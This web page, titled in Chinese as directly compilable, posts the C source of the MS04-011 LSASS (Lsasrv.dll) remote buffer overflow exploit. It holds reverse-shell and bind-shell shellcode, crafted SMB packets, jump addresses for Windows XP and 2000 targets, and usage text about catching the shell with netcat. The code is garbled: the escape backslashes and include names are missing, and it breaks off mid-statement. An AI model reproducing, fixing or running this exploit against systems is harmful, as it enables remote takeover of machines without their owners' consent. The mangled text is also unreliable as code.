LSASS溢出原代码(可直接编译版本)


#include #include #pragma comment(lib, "ws2_32") // reverse shellcode unsigned char reverseshell[] = "xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA" "xEBx05xE8xEBxFFxFFxFF" "x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12" "xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99" "x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12" "x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99" "x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9" "xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D" "x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA" "xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32" "x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10" "xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8" "xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66" "xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5" "x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8" "x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A" "x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12" "x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A" "x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C" "x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33" "xF9x7ExE0x5FxE0"; // bind shellcode unsigned char bindshell[] = "xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA" "xEBx05xE8xEBxFFxFFxFF" "x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12" "xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A" "x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6" "x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D" "xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A" "x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58" "x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0" "x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41" "xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B" "x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D" "xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA" "x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10" "x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF" "xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8" "xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79" "xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C" "x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59" "x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD" "xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC" "xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5" "xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6" "xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0" "xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED" "x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99"; char req1[] = "x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F" "x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02" "x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F" "x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70" "x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30" "x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54" "x20x4Cx4Dx20x30x2Ex31x32x00"; char req2[] = "x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00" "x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E" "x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00" "x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00" "x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00" "x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00" "x2Ex00x30x00x00x00x00x00"; char req3[] = "x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00" "x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E" "x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46" "x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40" "x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40" "x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48" "x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF" "x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00" "x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00" "x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00" "x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00" "x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00"; char req4[] = "x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00" "x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00" "x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00" "x49x00x50x00x43x00x24" "x00x00x00x3Fx3Fx3Fx3Fx3Fx00"; char req5[] = "x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00" "x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00" "x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00" "x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00" "x72x00x70x00x63x00x00x00"; char req6[] = "x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02" "x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00" "x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00" "x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11" "x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A" "xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00"; char req7[] = "x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02" "x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00" "xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00" "xECx03x00x00x00x00x00x00xECx03x00x00"; // room for shellcode here ... char shit1[] = "x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9"; char req8[] = "x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE" "x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF" "xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00" "x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00" "x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00" "x00x00x00x00xADx0Dx00x00"; // room for shellcode here ... char req9[] = "x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01" "x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02" "x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00" "x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00"; char shit3[] = "x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"; #define LEN 3500 #define BUFSIZE 2000 #define NOP 0x90 struct targets { int num; char name[50]; long jmpaddr; } ttarget[]= { { 0, "WinXP Professional [universal] lsass.exe ", 0x01004600 }, // jmp esp addr { 1, "Win2k Professional [universal] netrap.dll", 0x7515123c }, // jmp ebx addr { 2, "Win2k Advanced Server [SP4] netrap.dll", 0x751c123c }, // jmp ebx addr //{ 3, "reboot", 0xffffffff }, // crash { NULL } }; void usage(char *prog) { int i; printf("MS04-011 LSASRV.DLL Remote Exploitn"); printf("Compiled by HBU-LK007 (LK007@163.com)n"); printf("Usage:nn"); printf("%s [connectback IP] [options]nn", prog); printf("Targets:n"); for (i=0; i<3; i++) printf(" %d [0x%.8x]: %sn", ttarget.num, ttarget.jmpaddr, ttarget.name); printf("nOptions:n"); printf(" -t: Detect remote OS:n"); printf(" Windows 5.1 - WinXPn"); printf(" Windows 5.0 - Win2knn"); printf("Example:n"); printf("LSASS 0 192.168.1.10 4444 -tn"); printf("LSASS 0 192.168.1.10 4444n"); printf("nc 192.168.1.10 4444n"); exit(0); } int main(int argc, char *argv[]) { int i; int opt = 0; char *target; char hostipc[40]; char hostipc2[40*2]; unsigned short port; unsigned long ip; unsigned char *sc; char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(req4)+20]; char screq[BUFSIZE+sizeof(req7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="x66x81xECx1Cx07xFFxE4"; char strBuffer[BUFSIZE]; unsigned int targetnum = 0; int len, sockfd; short dport = 445; struct hostent *he; struct sockaddr_in their_addr; char smblen; char unclen; WSADATA wsa; printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n"); printf("--- Coded by .::[ houseofdabus ]::. ---nn"); if (argc 4) if (!memcmp(argv[4], "-t", 2)) opt = 1; if ( (argc > 4) && !opt ) { port = htons(atoi(argv[3]))^(USHORT)0x9999; ip = inet_addr(argv[4])^(ULONG)0x99999999; memcpy(&reverseshell[118], &port, 2); memcpy(&reverseshell[111], &ip, 4); sc = reverseshell; } else { port = htons(atoi(argv[3]))^(USHORT)0x9999; memcpy(&bindshell[176], &port, 2); sc = bindshell; } if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "x3cx12x15x75", 4); memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4); memcpy(&buf[2036], sc, strlen(sc)); memcpy(&buf[2840], "xebx06xebx06", 4); memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addr memcpy(&buf[2856], sc, strlen(sc)); for (i=0; ih_addr); memset(&(their_addr.sin_zero), '

comments powered by Disqus